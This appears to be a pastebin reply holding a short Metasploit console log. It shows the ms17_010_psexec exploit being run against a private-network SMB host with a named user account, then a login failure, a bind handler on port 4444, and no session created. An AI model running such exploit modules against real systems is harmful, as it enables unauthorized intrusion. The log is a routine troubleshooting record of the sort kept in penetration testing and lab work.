From Chocolate Owl, 5 Months ago, written in Plain Text.
This paste is a reply to Untitled from Tinct Bushbaby
- view diff
Embed
  1. sf5 exploit(windows/smb/ms17_010_psexec) > exploit
  2.  
  3. [*] 192.168.120.90:445 - Authenticating to 192.168.120.90 as user 'db-vl'...
  4. [-] 192.168.120.90:445 - Rex::Proto::SMB::Exceptions::LoginError: Login Failed: The server responded with error: STATUS_ACCOUNT_RESTRICTION (Command=115 WordCount=0)
  5. [*] Started bind TCP handler against 192.168.120.90:4444
  6. [*] Exploit completed, but no session was created.
  7.  
  8.